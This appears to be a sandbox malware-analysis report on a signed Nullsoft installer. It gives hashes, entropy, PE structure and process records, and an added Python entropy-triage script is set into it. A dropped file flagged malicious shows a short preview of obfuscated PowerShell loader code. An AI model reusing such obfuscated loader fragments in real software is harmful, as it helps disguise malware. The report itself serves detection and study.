SSDEEP: 768:O9PQagrLcVyo283wsxFu0RY0N1JDi7y1ffv/0JJq/Z9H5KM5vCnOoD2PPWyzReFO:MQbLC3wgK0iuZQDOs0xNfTBk6qxBF
MD5: 6ADE689B571046AD96876A499FFD4823
SHA1: 059706B7BA9927E1A956930AC34FE2D4B7213B1B
SHA-256: 5CF49A3778180D2653A50272127C61430271011A2F6576159911151A0FB993B6
SHA-512: 23A4628D7CD0464BC8E1AAC6B710495E5D593975432F91CDD2B486C4B34BE3C54492D438EA62B83E4B7F327AE3AB5D94C4BD7403F6307886BE35F4B60B7418A1
Malicious: false
Preview: ................?........c........z..._.............L...............................g..........6.................................................................c.............l..............................................................q..............................O................................................S.......................@....0e.?..................................m....................v................o.............................6.........................B.............u..................................u....................................................................................e..................................Q..........................F........^..........................m.............................................#.........Q........................................................................................oN......................................Q.....................................................................................................
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):344347
                        Entropy (8bit):7.600521375071459
                        Encrypted:false
                        SSDEEP:6144:PxzOJfViaEobFAA7wWLCdyqdXr0aSTdpuoc+5BDwqQ:4Jfeo9wW0pdXr0tT7uoRBG
                        MD5:E30DF8D1CB1C7190F309697463C8188C
                        SHA1:3CC6EE81BDBDC40A82F34FE0EAD837460EF00940
                        SHA-256:F4174A2A7E58460A38159A595D35DB1A357512B1E1E76EA441A053D03C5A0649
                        SHA-512:6F6313729020572EB2EBB767B58CF5B44663381BB7E811F86282DAA19D93FBC945D933F9EF18998E95255AC3D648494BB8874C458BAD1C84D9E0E9C2AEB837E8
                        Malicious:false
                        Preview:.........................ii......b......SS...\\\\\\\.4.............".............6666.ZZZ...............P..z......3.......;.R.~..........aa.../....o.$$.......h.==..........M.......g......\\\\....a...@@..............f..j..........{..........m...................{..................... ..........'................................................nn.@@.........................PPP......D.22....^......t..$$.......(.>..............................WWWW...JJ..........}................>>>..hhhhh.......ZZZ..........+.....aa.........................................................................cc..00.~~~.... ......................iiiii...........ll....f..................../................JJ...........;;;...UUUUU...CCC.........\.KKK.....G..............................b..-..........o.!!!!....0.......................p.........EEEEEE.AAA..........S..........D.nn.1.r.....o.j.''..>..R....................................................................?..................1...............nn....u..<<<<.....
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (4207), with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):73142
                        Entropy (8bit):5.166728070435595
                        Encrypted:false
                        SSDEEP:1536:QeQTgyz76JXSPqaEbLdJ5ZsTxIgoWvLu5Qt7dYWVfr:Iz2JXSPqRbLdJ5Z8Ig25Qt7dPJ
                        MD5:D5F9FE6CB29CA22937E16E7C0FA07B04
                        SHA1:17E1B54C6EA896CDD01EC17154247FC25D999A10
                        SHA-256:AE37D35FD9CF6C36F42A9F23A56DDDA94B754CC10C3997632FA7585D339A355F
                        SHA-512:171F0A51549C651C2092E11FF3BDDA36292DC68F0EEFE6157265EE736C763DE5FCAE29938F6E5334CB3F69607A33B07D478DA8191410CC2746A4F7036E25D982
                        Malicious:true
                        Preview:$Therapeutics=$Vaadserviet179;.....<#Roen Rsonnabelt Epizoology Sadomasochistisk Startler Otorhinolaryngology Beatrices #>..<#cathedralwise Regnbuehindens Spartiate Peise Honks Sammensvejsendes #>..<#naigue Gastrohypertonic genskrevet buist Distraheringers dosissen Tower #>..<#Ekspansionsbeholder Pensionerne Spunsendes Hunnican Sekundviserne Etterens #>..<#Gingilli Giftighed Germanizing Protium Resvagten Forhjelser Cyclostomatidae #>..<#Precalculated Pseudostratum Myelitis Kolons cirrussky Undvrendes #>...$Balcony = @'.hy roxy.P vilio$ PloyunRSuspe.sa MicromiUnrestrmNik slaefha rafnHumretstAtlisemlRe shaneBrnd.kisIncidems Grevsk=Pr medi$ SquushKForudsku Ter esmSambeskeR gionsnTalbehaiN,nrecekAtemporeefterprrGarnisoe PighajnvrgrigssArresun1Dorethe9Moistfu7MiqrafraOverdranSal,rinkGuenivie SweatcrFibrocrnLeuckare,otsebo;C assit.RooflinfRgerieru Co.oarnLnd tatcSgekommtPell gri Vatik.o UnknitnLedespo Ty.ebesN Re.olvo majoonnfrdigpahKryptogoAnti,iluSmellabs.ejlereeBogienshFeminino AftagnlDu
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):431949
                        Entropy (8bit):1.2534752844673904
                        Encrypted:false
                        SSDEEP:1536:XD5XWkkXU5F3I19UybYQB/YjqudrPIF2ZwG+vn5:XD5XcXUH3dybYQ9e9ni
                        MD5:869B68360A1E23A86847C3C760305509
                        SHA1:86DCB60824720D475AC688419D65A7DED97C85B9
                        SHA-256:ED306D19437D1188D9DFBE72E23CDFD4B44CCB9092906AA24097043B5D5C3602
                        SHA-512:DDFDC40DC59967BEE331B16998250DBECD7B0AEA93CB599F8D8CF1BE5CF3280987934F7E6A1EEC42D0295158BEF4D645100765EF11C73248163BC2F992129779
                        Malicious:false
                        Preview:........I............Z...................................._...T..........................................C...*.............x.............................................T........................i........$....................[t......................................./..........[.................................................P...........................X..............................<............4.....=............._..........%..............................o.................v..............2...........................................................................;............w........*....................................................,...............................o.....8.......................................................................Y....................T.................................................................................>.........H.".....................................@...............%...8.....u...............o.....................................[...........
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 66520453480448.000000
                        Category:dropped
                        Size (bytes):498522
                        Entropy (8bit):1.2529825290108598
                        Encrypted:false
                        SSDEEP:1536:8RleI23UqaKxWdq82m1gQDx6LN4ACCB1I/gCk+uDs9b:8RD+Wd0m1wLN4ACuIJk
                        MD5:F021AB50CCF26EDC2E90A7EDAD6F7E7B
                        SHA1:A24D9936137E91ED846F928AC2AA741915AED1B8
                        SHA-256:1667714305BCFDD4ABC3F115251D282A4E0517954DB1A9FAC3F74EB7B8AE2014
                        SHA-512:4261905ACC2F9307BC50943856B4EE300ED8F6FF14DD14BEB8BBC37684EA5842935984330C0FA42E9BC5530F2991426A6D91B1A80B3FFA3A4469A63F945E1454
                        Malicious:false
                        Preview:..*.............I....9.....3.........................................x..................................!...............................................c..................................................................................~.....................w..........w........................................................H.........Z...3........................._............}..............5.o..................s..............................!...............................................................................................................m...............................................m....................P...h..................U................................).............p.........................T..I........d..................>............&....G..........c...................................................|...................................R...................................l..a.........f..................................................].............................
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):349733
                        Entropy (8bit):1.2397864872646107
                        Encrypted:false
                        SSDEEP:768:rwjkYAiCysuvu8hRx0bgnXrNhXKeZNrbxiHfPx+lHTI+PNITz8bwIvGG76LkqWOq:rw0KY+z/hl8VzPBZ6iXc6d
                        MD5:E8A9F81281E8ED1DAA1A9FA98C11DA97
                        SHA1:87BB542C6175A4B51A4C8F4C35B93244B84DF88C
                        SHA-256:0333AE760111805FA8801B65D07659CE36DBDFF05BBCA40F1305238A4E9B94AC
                        SHA-512:87F3741D3EEA36C8559183F4307F7DACE6A3F39971FA813C13DA4C734038E34EF4D70F580CE9F96F0637EAE9093557159A56620FB9DFA51D6DBA882C621837BF
                        Malicious:false
                        Preview:..........?.......................X....................................j.-..................................................................Z.......................................................2....................\......................................k......................64.......N.K......3........D............................................................B...............................................................................F....................o......d...............................................3.................L....e.......Z......................................................................2...............................1..............................F.z.........................................i.......................0..........z...Q.....4..........l................................................0..............................<.........................H..................^.................$......................................................L...........
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):413602
                        Entropy (8bit):1.2424037027559116
                        Encrypted:false
                        SSDEEP:1536:n3axPycbUHvtclWN2TTHn3tJqChok8dEhx:EycwHv+lWN+z3jnCfdm
                        MD5:5414789DC51920495C97F8F8CD9EAC2A
                        SHA1:69D800A2463D4B0AEB7AA656EB9037659239C9DB
                        SHA-256:D32BF488FC11B9848CB4A2CC7EDD285D90316558F626833DA0E157BE515A99B7
                        SHA-512:B58A857363EEF41D3861F2D27FEF888A418D383E3F11D4C1F80684E7996539A1A2470C86933C69446FB215D7534A0EDDE12DC85DDC2A4BCDF58009F406C7329D
                        Malicious:false
                        Preview:.......................................E................................9..............................................................................................................................................................................................................y.......................................................n.F..................................................................+-I.....7.................0...........[................................!.......................v...............l.y................................................._.........................................................................................................................b.................................................................2....................H...................................................................p.....................................t........................................~....................../...........N.........................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):6656
                        Entropy (8bit):5.178709395875687
                        Encrypted:false
                        SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                        MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                        SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                        SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                        SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 0%
                        Joe Sandbox View:
                        • Filename: HJEbEB40vP.exe, Detection: malicious
                        • Filename: HJEbEB40vP.exe, Detection: malicious
                        • Filename: 004552024107.bat.exe, Detection: malicious
                        • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious
                        • Filename: Order 00293884800595.bat.exe, Detection: malicious
                        • Filename: 004552024107.bat.exe, Detection: malicious
                        • Filename: 004552024107.bat.exe, Detection: malicious
                        • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious
                        • Filename: Order 00293884800595.bat.exe, Detection: malicious
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
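                        The "Entropy (8bit)" figure in the dropped-file entries above is the Shannon entropy of the byte histogram, in bits per byte. It is the quickest way to sort this drop set: the 340 to 500 KB "data" files at roughly 1.25 bits are almost entirely one byte value with a sprinkling of other bytes (which is what their dotted previews show), the 344'347-byte file at 7.60 bits is compressed or encrypted payload, and the .Heg script and the small DLL sit in the 5-bit band typical of text and plain PE sections. The four identical 60-byte files written by powershell.exe are the "__PSScriptPolicyTest" probe that PowerShell itself creates at startup to check whether AppLocker or WDAC would block scripts; they are benign and not attacker-authored. The following Python script is an added example, not Joe Sandbox code: it reproduces the reported entropy for the probe file (its content is taken to be the preview text plus one trailing space, an assumption that accounts for the reported 60 bytes and gives exactly 4.0389 bits), and buckets two constructed blobs shaped like the sparse and the high-entropy drops. The bands in `classify` are rules of thumb, not Joe Sandbox's own thresholds.

```python
"""Reproduce the report's "Entropy (8bit)" column and sort dropped files by it.

Added example for this report, not Joe Sandbox code. The three inputs are
constructed here: the 60-byte AppLocker probe file (its text is the preview
shown in the report plus one trailing space, assumed from the reported size),
a sparse blob shaped like the ~340 KB "data" drops, and a random blob
standing in for the 7.6-bit drop. The classification bands are rules of
thumb chosen for this example, not Joe Sandbox's thresholds.
"""
import math
import random
from collections import Counter

# Exact content assumed for the dropped 60-byte file written by powershell.exe.
APPLOCKER_TEST_FILE = b"# PowerShell test file to determine AppLocker lockdown mode "

_rng = random.Random(20250110)  # fixed seed so the numbers are reproducible

# ~340 KB, 90% a single filler byte with random bytes scattered through it:
# this is what the 1.24-1.26 bit entropies in the report look like on disk.
SPARSE_BLOB = bytes(
    _rng.randrange(256) if _rng.random() < 0.10 else 0x00
    for _ in range(342_526)
)

# Uniformly random bytes: 8.0 bits is the ceiling of an 8-bit entropy estimate.
RANDOM_BLOB = bytes(_rng.randrange(256) for _ in range(344_347))


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the report's "Entropy (8bit)" figure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def dominant_byte(data: bytes):
    """Most common byte value and its share of the file; near 1.0 means padding."""
    value, count = Counter(data).most_common(1)[0]
    return value, count / len(data)


def classify(data: bytes) -> str:
    """Rule-of-thumb bucket for a dropped file, from its entropy alone."""
    h = shannon_entropy(data)
    if h < 2.0:
        return "sparse/padded"           # one byte value dominates
    if h < 6.5:
        return "text-or-code-like"       # scripts, plain PE sections
    if h > 7.2:
        return "compressed-or-encrypted"  # packed payload, LZMA, crypto output
    return "mixed"


if __name__ == "__main__":
    for name, blob in [("applocker-probe", APPLOCKER_TEST_FILE),
                       ("sparse-drop", SPARSE_BLOB),
                       ("random-drop", RANDOM_BLOB)]:
        value, share = dominant_byte(blob)
        print(f"{name:16} {len(blob):8d} B  H={shannon_entropy(blob):.4f}  "
              f"top byte 0x{value:02x} ({share:.0%})  {classify(blob)}")
```

                        Run it as a script to get one line per constructed file. For a real triage run, replace the constructed blobs with `open(path, 'rb').read()` of the dropped files; the dominant-byte share is the number to look at when a large drop reports an entropy near 1 bit, because it tells you how much of the file is filler before you spend time on it.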
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.5021233572287045
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:vfhlZ0vrbe.exe
                        File size:1'366'152 bytes
                        MD5:d29c88c314347eb87810e85e1e90a1f1
                        SHA1:37082bccbde394171014c6a23ba59867fd0db181
                        SHA256:122e9453d8424952667d1fbac82b31ccf2ab4076d14f306d1d97d675bc6fe213
                        SHA512:02880cc151b76ce8449d551ba421ddfffff5ffde708dd78f4c1579d4c60eee3035be3acdec97a9c7a3cf7647359e14e2a4c86d35bafddfdb2f967b04cca3bae9
                        SSDEEP:24576:gdcS1TkwkCSNeu4lIG8YM2xNB9NID3Fg3+oTc6oI:mX1TkwTSEbJ8YM2xD9NI5gOoT9n
                        TLSH:1C55E0E3A6110E89C67D92FD8617C154510A6F7ED8A8D60A31B3366FFDB3D438C4E84A
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@
                        Icon Hash:fd3ecf696931318d
                        Entrypoint:0x4033d8
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:671f2a1f8aee14d336bab98fea93d734
                        Signature Valid:false
                        Signature Issuer:CN=Statshemmelighedernes, O=Statshemmelighedernes, L=Savannah, C=US
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 21/09/2024 04:50:04 21/09/2027 04:50:04
                        Subject Chain
                        • CN=Statshemmelighedernes, O=Statshemmelighedernes, L=Savannah, C=US
                        Version:3
                        Thumbprint MD5:70FE4C29C07922A1881187DA11975537
                        Thumbprint SHA-1:2D6AFEDCD35966043371A5DD3B74AAD0EB577C48
                        Thumbprint SHA-256:2AE8393C09496DA50E960EA05F42935D79B27C2A01D1CB8B204476645505E1F0
                        Serial:66DCFB9754438D507EB16CB8846F70CE31F3051B
                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 00000224h
                        push esi
                        push edi
                        xor edi, edi
                        push 00008001h
                        mov dword ptr [ebp-14h], edi
                        mov dword ptr [ebp-0Ch], 0040A188h
                        mov dword ptr [ebp-08h], edi
                        mov byte ptr [ebp-04h], 00000020h
                        call dword ptr [0040809Ch]
                        mov esi, dword ptr [004080A0h]
                        lea eax, dword ptr [ebp-000000C4h]
                        push eax
                        mov dword ptr [ebp-000000B0h], edi
                        mov dword ptr [ebp-30h], edi
                        mov dword ptr [ebp-2Ch], edi
                        mov dword ptr [ebp-000000C4h], 0000009Ch
                        call esi
                        test eax, eax
                        jne 00007F77D4CDFF41h
                        lea eax, dword ptr [ebp-000000C4h]
                        mov dword ptr [ebp-000000C4h], 00000094h
                        push eax
                        call esi
                        cmp dword ptr [ebp-000000B4h], 02h
                        jne 00007F77D4CDFF2Ch
                        movsx cx, byte ptr [ebp-000000A3h]
                        mov al, byte ptr [ebp-000000B0h]
                        sub ecx, 30h
                        sub al, 53h
                        mov byte ptr [ebp-2Ah], 00000004h
                        neg al
                        sbb eax, eax
                        not eax
                        and eax, ecx
                        mov word ptr [ebp-30h], ax
                        cmp dword ptr [ebp-000000B4h], 02h
                        jnc 00007F77D4CDFF24h
                        and byte ptr [ebp-2Ah], 00000000h
                        cmp byte ptr [ebp-000000AFh], 00000041h
                        jl 00007F77D4CDFF13h
                        movsx ax, byte ptr [ebp-000000AFh]
                        sub eax, 40h
                        mov word ptr [ebp-30h], ax
                        jmp 00007F77D4CDFF06h
                        mov word ptr [ebp-30h], di
                        cmp dword ptr [ebp-000000C0h], 0Ah
                        jnc 00007F77D4CDFF0Ah
                        and word ptr [ebp+00000000h], 0000h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x853c | 0xa0 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x43000 | 0x637b0 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x14cf40 | 0x948 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x660c | 0x6800 | 3b90adcd2f1248db844446cb2ef15486 | False | 0.6663912259615384 | data | 6.411908920093797 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata | 0x8000 | 0x1340 | 0x1400 | b3bd9ad1bd1020c5cf4d51a4d7b61e07 | False | 0.4576171875 | data | 5.237673976044139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0xa000 | 0x25138 | 0x600 | c4e774255fea540ed5efa114edfa6420 | False | 0.4635416666666667 | data | 4.1635686587741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata | 0x30000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x43000 | 0x637b0 | 0x63800 | 7ec750b400c18fb2808562fed9408957 | False | 0.28931032113693467 | data | 5.302493764322081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0x43328 | 0x4180c | Device independent bitmap graphic, 255 x 510 x 32, image size 260100 | English | United States | 0.24935519940365264
                        RT_ICON | 0x84b38 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.3378238495208802
                        RT_ICON | 0x95360 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.38897939878074417
                        RT_ICON | 0x9e808 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.43522673594709493
                        RT_ICON | 0xa2a30 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.46856846473029046
                        RT_ICON | 0xa4fd8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.559016393442623
                        RT_ICON | 0xa5960 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.6312056737588653
                        RT_DIALOG | 0xa5dc8 | 0x120 | data | English | United States | 0.5138888888888888
                        RT_DIALOG | 0xa5ee8 | 0x11c | data | English | United States | 0.6056338028169014
                        RT_DIALOG | 0xa6008 | 0xc4 | data | English | United States | 0.5918367346938775
                        RT_DIALOG | 0xa60d0 | 0x60 | data | English | United States | 0.7291666666666666
                        RT_GROUP_ICON | 0xa6130 | 0x68 | data | English | United States | 0.7788461538461539
                        RT_VERSION | 0xa6198 | 0x2d8 | data | English | United States | 0.47527472527472525
                        RT_MANIFEST | 0xa6470 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                        DLL | Imports
                        ADVAPI32.dll | RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                        SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                        ole32.dll | OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                        COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                        USER32.dll | SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                        GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                        KERNEL32.dll | CreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA
                        Language of compilation system | Country where language is spoken | Map
                        English | United States | (map image)
                        No network behavior found


                        Target ID:0
                        Start time:22:35:47
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vfhlZ0vrbe.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vfhlZ0vrbe.exe"
                        Imagebase:0x400000
                        File size:1'366'152 bytes
                        MD5 hash:D29C88C314347EB87810E85E1E90A1F1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:22:35:47
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
